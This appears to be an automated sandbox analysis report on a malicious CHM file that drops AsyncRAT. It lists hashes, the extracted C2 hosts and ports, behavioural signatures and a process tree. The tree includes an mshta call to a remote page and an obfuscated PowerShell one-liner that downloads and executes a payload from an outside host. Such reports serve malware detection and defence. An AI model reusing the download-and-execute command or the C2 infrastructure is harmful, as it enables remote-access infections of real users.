Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted
09-10-2022 20:02
Static task
static1
Behavioral task
behavioral1
Sample
lol.chm
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
lol.chm
Resource
win10v2004-20220901-en
General
-
Target
lol.chm
-
Size
234KB
-
MD5
29984ec9b0bef9d92e9a2fec99e9b7d0
-
SHA1
701cdf5b2419f4da8247e6af9eaa376cdf6e2dc4
-
SHA256
9ad14a020dc9a937bbe2c2dcd63991e424fe174b96f0131962e24bdd9f823fa3
-
SHA512
be7703f487bccba2e473411288d1a2919358c49d18355f48aa5d73adb652550c33eeb9ca87dd786dbd46748c64c1af11e40ae6e342ef1b38dbe5fecdb667fe08
-
SSDEEP
6144:KveS9vg8qKoqjkqNdoYzgOS9vg8qKoqjkqDyoaF73:VSBg8iqjkCKUgOSBg8iqjkWaFT
Malware Config
Extracted
https://skynetx.com.br/tarefa.html
Extracted
asyncrat
3LOSH RAT
AAAAAAAAAAAA+++AAAAAAAAAAAA
chromedata.accesscam.org:7707
chromedata.accesscam.org:4404
chromedata.accesscam.org:5505
chromedata.accesscam.org:3303
chromedata.accesscam.org:2222
chromedata.accesscam.org:6606
chromedata.accesscam.org:8808
chromedata.accesscam.org:5155
chromedata.accesscam.org:5122
chromedata.accesscam.org:8001
chromedata.accesscam.org:9000
chromedata.accesscam.org:9999
chromedata.accesscam.org:8888
cdt.3utilities.com:7707
cdt.3utilities.com:4404
cdt.3utilities.com:5505
cdt.3utilities.com:3303
cdt.3utilities.com:2222
cdt.3utilities.com:6606
cdt.3utilities.com:8808
cdt.3utilities.com:5155
cdt.3utilities.com:5122
cdt.3utilities.com:8001
cdt.3utilities.com:9000
cdt.3utilities.com:9999
cdt.3utilities.com:8888
adobedata.webredirect.org:7707
adobedata.webredirect.org:4404
adobedata.webredirect.org:5505
adobedata.webredirect.org:3303
adobedata.webredirect.org:2222
adobedata.webredirect.org:6606
adobedata.webredirect.org:8808
adobedata.webredirect.org:5155
adobedata.webredirect.org:5122
adobedata.webredirect.org:8001
adobedata.webredirect.org:9000
adobedata.webredirect.org:9999
adobedata.webredirect.org:8888
127.0.0.1:7707
127.0.0.1:4404
127.0.0.1:5505
127.0.0.1:3303
127.0.0.1:2222
127.0.0.1:6606
127.0.0.1:8808
127.0.0.1:5155
127.0.0.1:5122
127.0.0.1:8001
127.0.0.1:9000
127.0.0.1:9999
127.0.0.1:8888
dimascu.duckdns.org:7707
dimascu.duckdns.org:4404
dimascu.duckdns.org:5505
dimascu.duckdns.org:3303
dimascu.duckdns.org:2222
dimascu.duckdns.org:6606
dimascu.duckdns.org:8808
dimascu.duckdns.org:5155
dimascu.duckdns.org:5122
dimascu.duckdns.org:8001
dimascu.duckdns.org:9000
dimascu.duckdns.org:9999
dimascu.duckdns.org:8888
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
DesbravadorUpdata.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource                                                                      yara_rule
behavioral2/memory/2768-138-0x0000000000400000-0x0000000000412000-memory.dmp  asyncrat
behavioral2/memory/2768-139-0x000000000040DD7E-mapping.dmp                    asyncrat
Blocklisted process makes network request 5 IoCs
Processes:
flow  pid   process
8     1904  mshta.exe
9     1904  mshta.exe
11    1904  mshta.exe
13    1904  mshta.exe
17    4584  powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                                     process
Key value queried  \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation  mshta.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                          pid   process         target process
PID 4584 set thread context of 2768  4584  powershell.exe  RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid   process
4584  powershell.exe
4584  powershell.exe
4584  powershell.exe
4584  powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  4584  powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid   process
4100  hh.exe
4100  hh.exe
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
description                       pid   process         target process
PID 4100 wrote to memory of 1904  4100  hh.exe          mshta.exe
PID 4100 wrote to memory of 1904  4100  hh.exe          mshta.exe
PID 1904 wrote to memory of 4584  1904  mshta.exe       powershell.exe
PID 1904 wrote to memory of 4584  1904  mshta.exe       powershell.exe
PID 4584 wrote to memory of 3664  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 3664  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 3664  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 2768  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 2768  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 2768  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 2768  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 2768  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 2768  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 2768  4584  powershell.exe  RegSvcs.exe
PID 4584 wrote to memory of 2768  4584  powershell.exe  RegSvcs.exe
Processes
-
C:\Windows\hh.exe
  "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\lol.chm
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  -
  C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" https://skynetx.com.br/tarefa.html
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    -
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $kaoskdoaksd = [System.NET.WebRequest]::Create('https://msantosm.com.br/logo.png');$ajdiasjdijasd = $kaoskdoaksd.GetResponse();$KASDJASDU = ([System.IO.StreamReader]($ajdiasjdijasd.GetResponseStream())).ReadToEnd()| .('{1}{0}'-f'EX','I')
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      -
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      -
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
memory/1904-133-0x0000000000000000-mapping.dmp
-
memory/2768-138-0x0000000000400000-0x0000000000412000-memory.dmp
Filesize
72KB
-
memory/2768-139-0x000000000040DD7E-mapping.dmp
-
memory/4584-135-0x0000000000000000-mapping.dmp
-
memory/4584-136-0x000001F5279B0000-0x000001F5279D2000-memory.dmp
Filesize
136KB
-
memory/4584-137-0x000001F50E7C0000-0x000001F50F281000-memory.dmp
Filesize
10.8MB
-
memory/4584-140-0x000001F50E7C0000-0x000001F50F281000-memory.dmp
Filesize
10.8MB